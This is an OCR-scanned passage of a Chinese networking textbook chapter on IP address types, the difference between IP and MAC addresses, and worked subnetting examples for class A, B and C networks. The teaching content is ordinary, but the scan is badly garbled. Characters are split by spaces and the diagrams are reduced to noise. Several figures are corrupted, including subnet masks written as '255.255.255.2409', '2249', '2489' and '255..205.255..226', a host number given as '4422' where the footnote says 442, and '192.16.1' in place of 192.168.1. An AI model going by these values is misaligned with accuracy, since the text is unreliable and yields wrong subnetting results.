第 258@ 个 主机 。 又 如 ,A 类 网 络 中 主机 112. 34. 3. 2 要 把 数据 发 送 给 所 处 网 络 中 另 一 台 
机 112. 34. 3.3, 其 目的 IP 可 以 为 “0. 34. 3. 3”。 

4. 主机 位 为 “0” 的 IP 

主机 位 为 “0” 的 IP 用 于 表示 一 个 网 段 。 例 如 ,192. 168. 1. 10 和 192. 168. 1. 20 两 个 主 
机 都 属于 192. 168. 1. 0 网 段 ; 172. 16.1. 10 和 172. 16. 1. 20 都 属于 172. 16. 0. 0 网 段 。 同 一 
网 段 的 主机 逻辑 上 处 于 同一 局 域 网 ,通过 交换 机 通信 ; 不 同 网 段 的 主机 处 于 不 同 局 域 网 , 通 
过 路 由 器 通信 。 

5. 受 限 广播 地 址 

全 “1”IP*255. 255. 255. 255” 被 称 为 受 限 广播 地 址 ,不 能 标识 设备 ,用 于 向 所 处 网 络 广播 数 
据 ,不 被 路 由 器 转发 ,因此 也 被 称 为 受 限 广播 地 址 。 如 图 5-16 所 示 , 路 由 器 连接 192. 168. 2.0 


192.168.2.7 192.168.2.4 192.168.2.3 192.168.1.7 192.168.1.4 192.168.1.8 
S99 935 
255.255.255.259| LI 
2 J 训 
| | DHCP 服 务 器 
es es 2 192.168.1.10 
192.168.2.5 192.168.2.6 192.168.1.5 192.168.1.6 
ey 
路 由 器 


图 5-16 受 限 广 播 地 址 


@ DHCP 服务 器 是 给 网 络 客 户 机 分 配 IP 地 址 的 服务 器 。 
加 ”把 主机 位 "1.2" 用 二 进 制 表 示 为 “00000001 00000010”, 再 将 16 位 二 进 制 转换 为 十 进 制 得 258。 


86 


第 5 章 ， 网络 层 协议 和 子 网 规划 
和 192.168. 1. 0 两 个 网 段 ,右边 主机 192. 168. 1. 10 服务 器 需要 向 全 网 广播 数据 包 , 则 把 数据 
包 首 部 目的 地 址 设 为 全 1” 地址 ”255. 255. 255. 255” 向 所 处 网 络 广播 。192. 168. 1.0 网 段 中 
的 所 有 主机 都 能 接收 到 广播 包 , 路 由 器 同样 可 以 接收 ,但 不 会 转发 至 192. 168. 2.0 网 段 。 

6. 自动 专用 地 址 
当主 机 获取 IP 地 址 不 成 功 时 , Windows 系统 将 会 从 169. 254. 0. 0 自动 专用 地 址 段 随 
机 给 本 地 分 配 一 个 PP。 例 如 ,在 图 5-17 中 ,局 域 网 DHCP 服务 器 故障 ,客户 机 A 启动 时 连 
续 3 次 发 送 广播 请 求 仍 无 法 获取 到 IP 地 址 ,此 时 Windows 将 会 从 自动 专用 地 址 段 随机 ?给 
本 机 分 配 一 个 临时 IP, 用 于 向 网 络 中 其 他 无 法 获得 IP 的 主机 通信 。 
交换 机 


客户 机 A . 
IP : 169.254.23.74 | ”| DHCP 服 务 器 
Mask : 255.255.255.0 一 一 ”一 一 192.168.1.254 
户 机 B 客户 机 C 


IP: 169.254.13.31 IP: 169.254.65.107 
Mask : 255.255.0.0 ”Mask : 255.255.0.0 


图 5-17 169. 254.0.0 网 段 IP 


7. 私有 地 址 

私有 地 址 也 被 称 为 专用 地 址 ,是 任何 机 构 内 部 都 可 以 重复 使 用 的 IP 地 址 。 私 有 地 址 不 
能 在 公 网 中 分 配 ,重复 分 配 也 不 会 造成 与 全 球 IP 冲突 。 为 解决 IP 地 址 短缺 问题 ,在 A、B、 
C 这 3 类 地 址 段 中 划分 出 部 分 区 域 作 为 私有 地 址 ,用 于 标识 机 构 内 部 主机 。 当 内 网 多 个 主 
机 需要 接 入 Internet 时 ,通过 NAT(Network Address Translation)@ 服 务 器 将 私有 地 址 转 
换 为 公有 地 址 ,共享 公共 IP 与 外 网 通信 。 私 有 地 址 段 如 下 。 

(1) A 类 地 址 中 的 10. 0. 0.0 一 10. 255. 255. 255 。 

(2) B 类 地 址 中 的 172. 16. 0.0 一 172. 31. 255. 255 。 

(3) C 类 地 址 中 的 192. 168. 0. 0 一 192. 168. 255. 255 。 

如 图 5-18 所 示 , 某 公 司 采用 C 类 私有 地 址 规划 内 部 网 络 ,通过 公共 IP*202. 116. 64. 100” 
接 入 Internet。 当 内 网 主机 需要 接 入 Internet 时 ,NAT 服务 器 将 来 自 内 网 的 私有 地 址 转 为 
公共 IP*202. 116. 64. 100” 接 人 外 网 。 


5.3.4 JIP 地 址 与 Mac 地 址 区 别 


Mac(Media Access Control) 地 址 也 被 称 为 物理 地 址 ,由 网 络 设备 制造 商 在 生产 时 刻录 
于 网 卡 闪存 芯片 中 ,用 户 无 法 更 改 。Mac 地 址 长 度 为 6B(48b) ,中 间 用 冒号 分 隔 , 如 00:00， 
20:0A:8C:6D。 其 中 ,前 24 位 由 生产 商 向 IEEE 组 织 申 请 @ ,后 24 位 由 厂商 自行 分 配 ,从 而 


@ 之 所 以 随机 是 为 了 避免 获得 的 自动 专用 IP 与 网 络 中 其 他 计算 机 IP 冲突 。 
加 ”NAT 网 络 地 址 转换 将 会 在 稍 后 章节 讲述 。 
国 ” 因 此 ,Mac 地 址 前 24 位 被 称 为 厂商 地 址 。 
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\ 

“client IP: 192.168.1.10 
ask : 255.255.255. 0 WW 

Gateway : 192.168.1.1 ' 


\ 站 NAT 服 务 器 
Client IP : 192.168.1.20 IP: 192.168.1.1 | IP: 202.116.64.100 


Mask : 255.255.255. 0 Mask: 255.255.255.0 ， Mask: 255.255.255.0 
~ Gateway : 192.168.} 1 
a 


图 5-18 私有 地 址 


保证 每 个 Mac 在 全 球 的 唯一 性 。 

Mac 地 址 是 网 卡 的 身份 表 识 ,虽然 在 全 球 具 有 唯一 性 ,但 是 在 Internet 中 通过 Mac 地 
址 寻 址 并 不 现实 ,因为 Mac 地 址 信息 与 地 方 区 域 无 关 , 若 全 球 通过 Mac 地 址 寻 址 找到 网 络 
中 某 个 主机 等 于 要 在 交换 机 上 百 亿 个 记录 中 找到 目的 主机 ,这 无 异 于 大 海 捞 针 。 为 解决 这 
个 问题 ,必须 引入 类 似 邮 政 编码 的 逻辑 地 址 在 全 球 划分 区 域 ,IP 地 址 应 运 而 生 。 

IP 地 址 长 度 为 32 个 比特 ,分 为 网 络 号 和 主机 号 ,其 中 公共 IP 在 全 球 范 围 内 划分 ,一 
个 IP 标 识 一 个 区 域 。 路 由 器 通过 数据 包 IP 地 址 进行 投递 ,抵达 目的 网 络 后 交换 机 再 根据 
Mac 地 址 找到 目的 主机 ,整个 过 程 犹 如 信件 的 投递 过 程 ,IP 地 址 类 似 于 邮政 编码 ,Mac 地 址 
类 似 于 收 件 人 名 称 ,如 图 5-19 所 示 。 

IP 地 址 


四 OOGGIO 风 
者 : 广州 天 源 路 广东 交通 职业 技术 学 院 | 


张 三 收 


图 5-19 信件 投递 地 址 


5.4 子 网 划分 


在 当初 规划 IP 地 址 时 ,A 类 IP 适用 于 大 规模 网 络 ,被 分 配给 大 型 网 络 服务 机 构 和 组 
织 ; B 类 IP 适用 于 中 规模 网 络 , 被 分 配给 大 型 公司 和 其 他 组 织 ,这 样 分 配 导 致 大 量 IP 地 址 


@ 由 于 内 部 网 络 所 有 主机 共享 NAT 服务 器 的 公共 IP 接 入 Internet, 也 就 是 说 公共 IP 在 标识 某 个 NAT 服务 器 的 
同时 也 代表 一 个 区 域 网 络 。 基 于 这 种 方法 IP 地 址 在 全 球 分 配 ,可 以 根据 数据 包 IP 地 址 定位 到 网 络 地 理 范围 。 
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的 浪费 和 消耗 0?。 另 外 ,大 型 网 络 中 的 广播 数据 包 会 堵塞 带宽 ,造成 网 络 拥塞 。 例如 ,A 类 
网 络 能 容纳 约 1700 万 个 设备 , 当 网 络 中 某 个 主机 用 全 “1” 地 址 向 全 网 广播 时 9 势必 造成 网 
络 准 痪 。 

为 了 方便 管理 ,提高 网 络 运行 效率 和 安全 ,同时 解决 IP 地 址 不 足 的 问题 ,由 此 引入 子 网 
划分 。 子 网 划分 是 借助 子 网 掩 码 重 新 标识 子 网 位 和 主机 位 ,在 大 型 网 络 中 划分 若干 个 子 网 ， 
从 而 将 一 个 大 网 分 割 为 多 个 较 小 的 逻辑 网 络 ,不 同 子 网 属于 不 同 逻 辑 网 络 @ ,广播 被 限制 于 
子 网 内 部 ,这 样 可 以 有 效 抑制 广播 风暴 ,以 减少 拥塞 。 

子 网 掩 码 C(Subnet Mask) 长 度 和 IP 地 址 相同 , 共 32 位 。 它 将 IP 地 址 的 网 络 位 定义 为 
“1”, 子 网 位 定义 为 "1”, 主 机 位 定义 为 "0?。 引 入 的 子 网 位 占用 部 分 主机 位 ,从 而 把 一 个 网 络 
划分 为 多 个 大 小 相同 的 逻辑 子 网 。 单 个 子 网 掩 码 没有 任何 意义 ,必须 结合 IP 地 址 一 起 
使 用 。 


5.4.1 A 类 JIP 的 子 网 划分 实例 


1. 实例 一 

对 于 A 类 IP*10.130.1.186”, 若 不 划分 子 网 ,那么 根据 子 网 掩 码 定 义 准则 ,“10” 作 为 网 
络 位 被 定义 为 8 个 “1”,“130. 1.186” 作 为 主机 位 被 定义 为 24 个 “0”, 如 图 5-20 所 示 。 其 默 
认 子 网 掩 码 @ 是 “255. 0. 0. 0”, 记 为 “10. 130. 1. 186/8”(8 表示 IP 地 址 对 应 的 子 网 掩 码 有 
8 个 “1”)。IP 地 址 必须 结合 其 子 网 掩 码 才 可 以 判断 所 处 网 络 的 具体 位 置 @, 含 义 如 下 。 

(1) 网 络 号 : 第 10 个 网 络 。 

(2) 主机 号 : 10000010 00000001 10111010。 

(3) IP 地 址 含义 : 表示 处 于 第 10 网 络 中 的 第 8520122® 主机 。 


IP 地 址 
oojojol oo 1ojololololo ofolofofofofof 1lol1lililolilo 
10. 130. 让 186 
2 河 
网 络 位 主机 位 
子 网 掩 码 
oC 
1 1LI01010101010101011010101010101010110101010101010101 
da La 
255 0. 0 0 


图 5-20 A 类 IP 默认 子 网 掩 码 


@ 例如 ,一 个 B 类 网 络 能 容纳 65534 个 设备 , 当 某 大 型 服务 机 构 主 机 数量 只 有 几 千 台 时 ,剩余 IP 将 被 保留 以 供 其 
日 后 使 用 ,不 予 分 配 , 从 而 导致 大 量 IP 地 址 的 浪费 。 

@ ”例如 ,用 户 在 扫描 网 络 时 ,查询 信息 会 向 全 网 广播 ,接收 到 广播 的 主机 都 要 做 出 相应 ,得 到 扫描 结果 ,整个 扫描 
过 程 会 在 网 络 中 产生 大 量 广播 风暴 堵塞 带宽 。 

@@” 由 于 不 同 子 网 属于 不 同 的 人 逻辑 网 络 , 因 此 不 同 子 网 之 间 的 主机 即使 网 络 号 相同 也 不 能 相互 通信 ,必须 通过 路 由 
器 寻 址 转发 。 

图 ”默认 子 网 掩 码 即 不 划分 子 网 的 子 网 掩 码 。 

回 当 引 入 子 网 掩 码 后 ,IP 地 址 和 子 网 掩 码 必须 配合 使 用 ,单个 IP 地 址 和 单个 子 网 掩 码 都 没有 确切 含义 。 

加 将 24 个 主机 位 "10000010 00000001 10111010” 转 换 为 十 进 制 为 “8520122”。 
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2. 实例 二 

同样 ,对 于 A 类 IP*10.130.1.186”, 那 么 若 划 分 子 网 ,那么 子 网 位 占用 主机 位 的 最 高 两 
位 ,将 剩余 的 22 位 作为 主机 位 ,根据 子 网 掩 码 定 义 准则 ,“00001010” 作 为 网 络 位 被 定义 为 8 个 
“1”,“10” 作 为 子 网 位 被 定义 为 “11”, 将 剩余 22 个 主机 位 定义 为 “0”, 如 图 5-21 所 示 。 其 子 
网 掩 码 是 “255. 192. 0. 0”, 记 为 “10. 130. 1. 186/10”。 该 网 络 共 划 分 出 2 一 2 三 2 个 子 网 2， 
第 一 个 子 网 是 “01? 子 网 ,第 二 个 子 网 是 “10? 子 网 ,每 个 子 网 能 容纳 2” 一 2 二 4194302 个 主 
机 。IP 地 址 具体 含义 如 下 。 

(1) 网 络 号 : 第 10 个 网 络 。 

(2) 子 网 号 : 10。 

(3) 主机 号 : 000010 00000001 10111010。 

(4) IP 地 址 含义 : 表示 处 于 第 10 网 络 中 第 29 子 网 的 第 131514@ 主机 。 


RD RR RD 1-T-T- 
| Ll 1 1 1 
1010101011;01110;1110101010101110! i111 101 
二 | 


10. 130 本 186 
网 络 位 子 网 位 E 机 位 
子 网 拓 码 


上 0. 
图 5-21 A 类 划分 子 网 实例 二 
3. 实例 三 
在 此 ,还 是 对 于 A 类 IP*10.130.1.186” 划 分 子 网 , 子 网 位 占用 主机 位 8 位 ,剩余 16 位 
作为 主机 位 ,根据 子 网 掩 码 定 义 准则 ,“00001010” 作 为 网 络 位 被 定义 为 8 个 “1”,“10000010” 
作为 子 网 位 被 定义 为 8 个 “1”, 剩 余 16 个 主机 位 被 定义 为 "0”, 如 图 5-22 所 示 。 其 子 网 掩 码 
是 “255. 255. 0. 0”, 记 为 “10. 130.1. 186/16”。 此 时 ,第 10 个 网 络 共 划 分 出 2 一 2 一 254 个 子 
网 ,每 个 子 网 能 容纳 2* 一 2 二 65534 个 主机 。IP 地 址 结合 子 网 掩 码 ,具体 含义 如 下 。 


0. 
图 5-22 A 类 划分 子 网 实例 三 


四 子 网 号 和 网 络 号 .主机 号 一 样 ,不 能 存在 全 0 和 全 1, 子 网 号 全 “0" 和 全 “1" 作 为 特殊 用 途 ,不 能 标识 主机 ,因此 本 
例 不 存在 第 "00" 子 网 和 “11" 子 网 。 

@ ”将 两 个 子 网 位 *10” 换 为 十 进 制 为 *2”. 

回 将 22 个 主机 位 *000010 00000001 10111010” 转 换 为 十 进 制 为 "131514”。 
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(1) 网 络 号 : 第 10 个 网 络 。 

(2) 子 网 号 : 10000010 。 

(3) 主机 号 : 00000001 10111010。 

(4) IP 地 址 含义 : 表示 处 于 第 10 网 络 中 第 130 子 网 的 第 4429 主机 。 

从 以 上 3 个 实例 可 以 看 出 ,对 于 同一 个 IP 地 址 可 以 有 不 同 子 网 掩 码 ,含义 也 不 尽 相 同 。 
IP 地 址 必须 结合 其 子 网 掩 码 才 有 确切 含义 ,没有 子 网 掩 码 的 IP 地 址 ,也 没有 IP 地 址 的 子 
网 掩 码 。 在 传统 子 网 划分 中 , 子 网 位 只 占 主机 位 ,不 占 网 络 位 。 对 于 一 个 全 而 言 ,主机 位 
数量 是 一 定 的 , 子 网 位 越 多 ,划分 的 子 网 数量 也 越 多 ,相应 每 个 子 网 能 容纳 的 主机 数量 
越 少 。 


5.4.2 B 类 IP 的 子 网 划分 实例 


1. 实例 一 

对 于 B 类 IP*172.16.1.186”, 若 不 划分 子 网 ,那么 "172. 16” 作 为 网 络 位 被 定义 为 16 个 
“1”,“1.186” 作 为 主机 位 被 定义 为 16 个 “0”, 如 图 5-23 所 示 。 其 默认 子 网 掩 码 为 *255. 255. 0. 0”， 
记 为 "172. 16. 1.186/16”。 此 时 ,整个 网 络 没 有 划分 任何 子 网 ,IP 具体 含义 如 下 。 

(1) 网 络 号 : 172. 16。 

(2) 主机 号 : 00000001 10111010。 

(3) IP 地 址 含义 : 表示 处 于 172. 16 网 络 中 的 第 4422 主机 。 


加地 址 


| Rn pt tr eh pe tp 


1r-r-， + 
加 oll ooolololol 14010101011010101010101011111011111110! 
站 | 村 tied led esd ed tod eg A fet Bo ha 
172. 16. 1 186 
a 
网 络 位 主机 位 

子 网 掩 码 
Cr -41-1-T-1 
REEHHRHEHHHHH W111!ofoiol oo!o! oio!ioioioolo 101010! 
le eu tl ee etl ee el ed We etd ed et A dd | 

255. 255. 0. 0 


图 5-23 B 类 IP 默认 子 网 掩 码 


2. 实例 二 

同样 ,对 于 B 类 IP* 172. 16.1. 186”, 子 网 位 占用 主机 位 8 位 ,剩余 8 位 作为 主机 位 ,如 
图 5-24 所 示 。 其 子 网 掩 码 为 “255. 255. 255. 0”, 记 为 “172. 16. 1. 186/24”。 该 网 络 共 能 划分 
2 一 2 二 254 个 子 网 ,每 个 子 网 能 容纳 2: 一 2 二 254 个 主机 。IP 具体 含义 如 下 。 

(1) 网 络 号 : 172. 16 。 

(2) 子 网 号 : 00000001 。 

(3) 主机 号 : 10111010。 

(4) IP 地 址 含义 : 表示 处 于 172. 16 网 络 中 第 1 子 网 的 第 186 主机 。 


@@ 将 16 个 主机 位 "00000001 10111010? 统 一 转换 为 十 进 制 为 “442”。 
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IP 地 址 
Po 
111011101111101011010101110;010101010101010;0101111110111111;01110! 
et tsh Od el dba tod st feet le tn teen bra hor sa a fend That pel for Pod ve thd eed at Pad tet iat Bo ah ed od 
172. 16. tl: 18 
了 A fl 
网 络 位 子 网 位 主机 位 
子 网 掩 码 
FC 
1 1010101010101010! 
Lobb bd ba bl 
255 255. 255 0 
图 5-24 B 类 划分 子 网 实例 二 
3. 实例 三 


在 此 ,还 是 对 于 B 类 IP*172. 16.1.186”, 子 网 位 占用 主机 位 12 位 ,剩余 4 位 作为 主机 
位 ,如 图 5-25 所 了 示 。“172. 16” 作 为 网 络 位 被 定义 为 16 个 “1”,“00000001 1011” 作 为 子 网 位 
被 定义 为 12 个 “1”, 其 余 4 位 作为 主机 位 被 定义 为 “0”, 其 子 网 掩 码 是 “255. 255. 255. 2409”, 记 
为 “172. 16. 1. 186/28”。 此 时 , 共 能 划分 22 一 2 一 4094 个 子 网 ,每 个 子 网 能 容纳 2 一 2 一 14 个 主 
机 。IP 具体 含义 如 下 。 

(1) 网 络 号 : 172. 16 。 

(2) 子 网 号 : 00000001 1011 。 

(3) 主机 号 : 1010 。 

(4) IP 地 址 含义 : 表示 处 于 172. 16 网 络 中 第 27@ 子 网 的 第 10@8 主机 。 


IP 地 址 


图 5-25 B 类 划分 子 网 实例 三 


5.4.3 C 类 IP 的 子 网 划分 实例 


1. 实例 一 

对 于 C 类 IP “192. 168. 1.186”, 若 不 划分 子 网 ,那么 “192. 168. 1” 作 为 网 络 位 被 定义 为 
24 个 “1”,“186” 作 为 主机 位 被 定义 为 8 个 “0”, 如 图 5-26 所 示 。 其 默认 子 网 掩 码 是 
“255. 255. 255. 0”, 记 为 “192. 168. 1. 186/24”。 此 时 ,网 络 没 有 划分 任何 子 网 ,IP 具体 含义 


@ 子 网 掩 码 中 的 最 后 8 位 *11110000” 转 换 为 十 进 制 为 "240”。 
@ 将 子 网 位 "11011" 转 换 为 十 进 制 为 ~*27”。 
回 将 主机 位 "1010” 转 换 为 十 进 制 为 ~10”。 
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如 下 。 
(1) 网 络 号 : 192. 168. 1。 
(2) 主机 号 ; 10111010。 
(3) IP 地 址 含义 : 表示 处 于 192. 168. 1 网 络 中 的 第 186 主机 。 


IP 地 址 
For 
11111010! 101110111:010101010 
Pr hs Su Ba sl he dg ot ed etl Be tt sd a eas 
168. 
网 络 位 


5-26 C 类 IP 默认 子 网 掩 码 


2. 实例 二 

同样 ,对 于 C 类 “IP 192.168. 1. 186”, 子 网 位 占用 主机 位 3 位 ,剩余 5 位 作为 主机 位 ,如 
图 5-27 所 示 。“192. 16. 1” 作 为 网 络 位 被 定义 为 24 个 “1”,“101” 作 为 子 网 位 被 定义 为 3 个 
“1”, 剩 余 5 位 作为 主机 位 被 定义 为 “0”, 子 网 掩 码 是 “255. 255. 255. 2249”, 记 为 “192. 168. 
1.186/27”。 此 时 ,该 网 络 共 划 分 出 2 一 2 一 6 个 子 网 ,每 个 子 网 能 容纳 2 一 2 二 30 个 主机 。 
IP 具体 含义 如 下 。 

(1) 网 络 号 : 192. 168. 1。 

(2) 子 网 号 ; 101。 

(3) 主机 号 : 11010。 

(4) IP 地 址 含义 : 表示 处 于 192. 168. 1 网 络 中 第 58 子 网 的 第 26@ 主机 。 


子 网 位 ”主机 位 


子 网 掩 码 


P-P-P 


3. 实例 三 
在 此 ,还 是 对 于 C 类 IP“192. 168. 1. 186”, 子 网 位 占用 主机 位 5 位 ,剩余 3 位 作为 主机 
位 ,如 图 5-28 所 示 。“192. 16. 1 "作为 网 络 位 被 定义 为 24 个 “1”,“10111” 作 为 子 网 位 被 定义 


@ 子 网 掩 码 中 的 最 后 8 位 *11100000" 转 换 为 十 进 制 为 "224”。 
@ 将 子 网 位 "101" 转 换 为 十 进 制 为 *5”。 
回 ”将 主机 位 11010" 转 换 为 十 进 制 为 *26”。 
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为 5 个 “1”, 剩 余 3 位 作为 主机 位 被 定义 为 “0”, 子 网 掩 码 是 “255. 255. 255. 2489”, 记 为 
“192. 168. 1. 186/29”。 此 时 ,该 网 络 共 划分 出 于 一 2 一 30 个 子 网 ,每 个 子 网 能 容纳 至 一 2 一 6 个 
主机 。IP 具体 含义 如 下 。 

(1) 网 络 号 : 192. 168. 1 。 

(修了 予 网 号 5 li0ui。 

(3) 主机 号 : 010。 

(4) IP 地 址 含义 : 表示 处 于 192. 168. 1 网 络 中 第 23@ 子 网 的 第 2@8 主机 。 

IP 地 址 


网 络 位 子 网 位 ”主机 位 
i 
255, 255, 255, 248 
图 5-28 C 类 划分 子 网 实例 三 
当 用 C 类 IP 划 分子 网 时 ,由 于 子 网 位 和 主机 位 都 不 能 为 全 “0 和 全 “1”, 因 此 子 网 位 和 
主机 位 至 少 占用 两 位 才能 划分 子 网 。 子 网 掩 码 取 值 和 子 网 长 度 相 关 ,C 类 IP 子 网 掩 码 表 见 
表 5-3, 读 者 应 在 理解 的 基础 上 识 记 子 网 长 度 和 子 网 掩 码 内 在 联系 。 
表 5-3 C 类 IP 子 网 掩 码 表 


可 容纳 的 | 每 子 网 可 容纳 | ”所 有 子 网 可 容纳 
子 网 位 长 度 | 主机 位 长 度 子 网 拖 码 
子 网 数量 | ”主机 数量 的 主机 数量 
2 6 255. 255. 255. 192 22 一 2 一 2 25 一 2 一 62 2X62 一 124 
3 5 255..205.255..226 2: 一 2 一 6 25 一 2 一 30 6X30 王 180 
4 4 255. 255. 255, 240 24 一 2 一 14 24 一 2 一 14 14X14 一 196 
5 3 255.2565.255.248 2 一 2 一 30 23 一 2 一 6 30X6 一 180 
6 2 255. 255.255. 252 25 一 2 一 62 22: 一 2 一 2 62X2=124 
4. 实例 四 


某 公司 通过 交换 机 组 成 企业 内 部 网 ,其 中 在 192. 168. 1. 0 网 段 存在 技术 部 和 销售 部 两 
个 部 门 ,各 有 100 台 主 机 。 现 考虑 到 安全 性 和 稳定 性 ,要 求 在 不 改变 原 网 段 的 基础 上 实现 部 
门 之 间 不 能 相互 通信 ,请 给 出 升级 方案 。 

分 析 : 在 交换 机 中 可 以 通过 划分 子 网 的 方法 限制 部 门 之 间 的 通信 。 然 而 ,划分 子 网 后 
会 减少 子 网 中 能 容纳 的 主机 数量 ,并 且 划 分 的 子 网 越 多 ,每 个 子 网 可 容纳 的 主机 数 越 少 。 根 
据 表 5-3, 当 C 类 IP 子 网 位 占 主机 位 2 位 时 ,每 个 子 网 最 多 能 容纳 62 台 设 备 , 远 不 能 满足 需 


@ 子 网 掩 码 中 最 后 8 位 *11111000” 转 换 为 十 进 制 为 *248”。 
@ 将 子 网 位 "10111” 转 换 为 十 进 制 为 *23”。 
回 ”将 主机 位 "10” 转 换 为 十 进 制 为 ~2”。 
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求 。 为 解决 类 似 问题 ,目前 大 多 数 公司 采取 灵活 子 网 划分 方案 ,允许 子 网 位 为 全 “0” 和 全 
“1”。 子 网 位 借用 主机 位 1 位 ,剩余 7 位 作为 主机 位 , 子 网 掩 码 为 “255. 255. 255. 128”, 此 时 
可 以 划分 出 两 个 子 网 ,第 一 子 网 是 子 网 0, 第 二 子 网 是 子 网 1, 具 体 规划 方案 见 表 5-4。 


表 5-4 子 网 划分 方案 


可 容纳 的 可 容纳 的 。 | 所 有 子 网 可 容纳 
号 
其 间 于 网 潜 风 子 网 数量 | 子 网 主机 数量 的 主机 数量 
技术 部 本 0 27 —2=126 ee 
一 销售 部 “| 255. 255. 255. 128 2 1 2 2=126 2X126 一 252 


注 : 子 网 号 全 “0" 和 全 “1 的 IP 本 身 作为 特殊 IP 不 子 分 配给 主机 。 但 是 由 于 实际 中 会 遇 到 子 网 容纳 主机 数量 不 足 
的 情况 ,因此 交换 机 可 通过 软件 升级 支持 子 网 号 为 全 “0" 和 全 “1" 的 划分 方案 。 然 而 ,这 种 规划 方案 与 传统 子 网 划分 不 兼 
容 , 和 传统 交换 机 级 联 会 出 现 子 网 无 法 正常 通信 的 现象 , 故 一 般 不 建议 采用 。 


5.4.4 子 网 地 址 和 子 网 广播 地 址 


子 网 的 引入 同样 来 源 于 生活 。 以 学 校 为 例 , 为 快速 寻 址 可 以 把 学 生 进 行 分 班 分 组 ,IP 
地 址 的 网 络 号 相当 于 班 别 号 ,主机 号 相当 于 学 号 ,划分 子 网 相当 于 在 一 个 班 中 分 组 。 为 区 分 
和 协调 组 成 员 ,每 个 小 组 必须 有 唯一 标识 ,类 似 于 第 一 组 .第 二 组 ,由 此 引入 子 网 地 址 和 子 网 
广播 地 址 。 

子 网 地 址 是 子 网 中 主机 位 全 “0” 的 IP 地 址 ,相当 于 每 个 小 组 唯一 标识 ,用 于 区 分 网 络 中 
不 同 子 网 。 子 网 广播 地 址 是 子 网 中 主机 位 全 “1” 的 IP 地 址 ,代表 一 个 小 组 中 所 有 成 员 ,下面 
举例 说 明 具 体 的 计算 方法 。 

1. 实例 一 

在 192. 168. 1.0 网 段 中 划分 6 个 子 网 ,计算 每 个 子 网 的 子 网 地 址 和 子 网 广播 地 址 。 

分 析 : 本 例 要 求 划分 6 个 子 网 ,根据 表 5-3 , 子 网 掩 码 应 为 "255. 255. 255. 224”, 此 时 子 
网 位 占用 主机 位 3 位 ,剩余 的 5 位 作为 主机 位 。 

在 第 001 子 网 中 ,将 主机 位 定义 为 全 “0”, 即 “00100000”, 转 变 为 十 进 制 是 "32”, 子 网 地 
址 是 “192. 168. 1. 32”; 将 主机 位 定义 为 全 “1”, 即 “00111111”, 转 变 为 十 进 制 是 “63”, 子 网 广 
播 地 址 是 “192. 168. 1. 63”; 由 于 子 网 地 址 和 子 网 广播 地 址 不 能 标识 主机 ,因此 第 一 子 网 的 
第 1 主机 IP 是 “00100001”, 第 一 子 网 的 最 后 一 主机 是 “00111110”, 转 换 为 十 进 制 为 
“192. 168. 1. 33 一 192. 168. 1. 62”。 在 这 个 网 段 中 ,所 有 IP 都 属于 “192. 168. 1. 32” 子 网 ,都 
拥有 同一 子 网 广播 地 址 "192. 168. 1.63”。 假 如 数据 包 首 部 目的 地 址 填充 为 *192. 168. 1. 63”, 则 
第 一 子 网 中 的 所 有 主机 ( 即 192. 168. 1. 33 一 192. 168. 1. 62) 都 能 接收 到 广播 包 . 但 交换 机 不 
会 广播 到 其 他 子 网 中 去 。 

在 第 010 子 网 中 ,将 主机 位 定义 为 全 “0”, 即 “01000000”, 转 变 为 十 进 制 是 “64”, 子 网 地 
址 是 “192. 168. 1. 64”; 将 主机 位 定义 为 全 “1”, 即 “01011111”, 转 变 为 十 进 制 是 “95”, 子 网 广 
播 地 址 是 “192. 168. 1. 95”; 第 二 子 网 中 的 第 1 主机 IP 是 “01000001” ,第 二 子 网 中 的 最 后 一 
主机 是 “01011110”, 转 换 为 十 进 制 即 “192. 168. 1. 65 一 192. 168. 1. 94”。 在 这 个 网 段 中 ,所 有 
IP 都 属于 “192.168. 1. 64” 子 网 ,都 拥有 同一 子 网 广播 地 址 “192. 168. 1. 95”。 如 果 要 向 010 
子 网 所 有 主机 广播 ,目的 地 址 应 设 为 "192. 168. 1. 95”。 
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其 余子 网 的 子 网 地 址 和 子 网 广播 地 址 算法 类 似 , 具 体 子 网 划分 见 表 5-5。 通 过 观察 可 
以 发 现 , 每 个 子 网 的 子 网 地 址 即 IP 段 最 小 值 ,每 个 子 网 的 子 网 广播 地 址 即 IP 段 的 最 大 值 ， 
所 有 子 网 差 值 都 是 32, 因 为 每 个 子 网 包含 32 个 IP( 其 中 两 个 IP 分 别 是 子 网 地 址 和 子 网 广 
播 地 址 ,剩余 30 个 IP 用 于 标识 子 网 主机 ) 。 


表 5-5 掩 码 为 255.255.255.224 的 子 网 划分 


子 网 地 址 子 网 广播 地 址 
号 Ey -标识 4 1TP 区 
于 网 3 (最 小 IP) (最 大 1IP) IP 县 可 用 于 标识 主机 的 卫 段 


1 192. 168. 1. 32 | 192. 168. 1. 63 | 192. 168. 1. 32 一 192. 168. 1. 63 192. 168. 1. 33 一 192. 168. 1. 62 

2 192. 168. 1. 64 | 192. 168. 1. 95 |192. 168. 1. 64 一 192. 168. 1. 95 192. 168. 1. 65 一 192. 168. 1. 94 

3 192. 168. 1. 96 | 192. 168. 1. 127 | 192. 168. 1. 96 一 192. 168. 1. 127 | 192. 168. 1. 97 一 192. 168. 1. 126 

4 192. 168. 1. 128 | 192. 168. 1. 159 | 192. 168. 1. 128 一 192. 168. 1. 159 | 192. 168. 1. 129 一 192. 168. 1. 158 

5 192. 168. 1. 160 | 192. 168. 1. 191 | 192. 168. 1. 160 一 192. 168. 1. 191 | 192. 168. 1. 161 一 192. 168. 1. 190 

6 192. 168. 1. 192 | 192. 168. 1. 223 | 192. 168. 1. 192 一 192. 168. 1. 223 | 192. 168. 1. 193 一 192. 168. 1. 222 
2. 实例 二 


在 192. 168. 1.0 网 段 中 划分 14 个 子 网 ,计算 每 个 子 网 的 子 网 地 址 和 子 网 广播 地 址 。 

分 析 : 根据 表 5-3, 划 分 14 个 子 网 的 掩 码 应 为 "255. 255. 255. 240”, 此 时 子 网 位 占用 主 
机 位 4 位 ,剩余 4 位 作为 主机 位 。 

(1) 第 001 子 网 的 子 网 地 址 是 “00010000”, 即 “192. 168. 1. 16”, 广播 地 址 是 
“00011111”, 即 “192. 168. 1. 31”. 

(2) 第 010 子 网 的 子 网 地 址 是 “00100000”, 即 “192. 168. 1. 32”, 广播 地 址 是 
“00101111”, 即 “192. 168. 1. 47”. 

其 余子 网 类 似 ,具体 子 网 划分 见 表 5-6。 此 时 ,所 有 子 网 差 值 为 16, 因 为 每 个 子 网 包含 
16 个 IP( 其 中 两 个 IP 分别 是 子 网 地 址 和 子 网 广播 地 址 ,剩余 14 个 IP 用 于 标识 子 网 主机 )。 


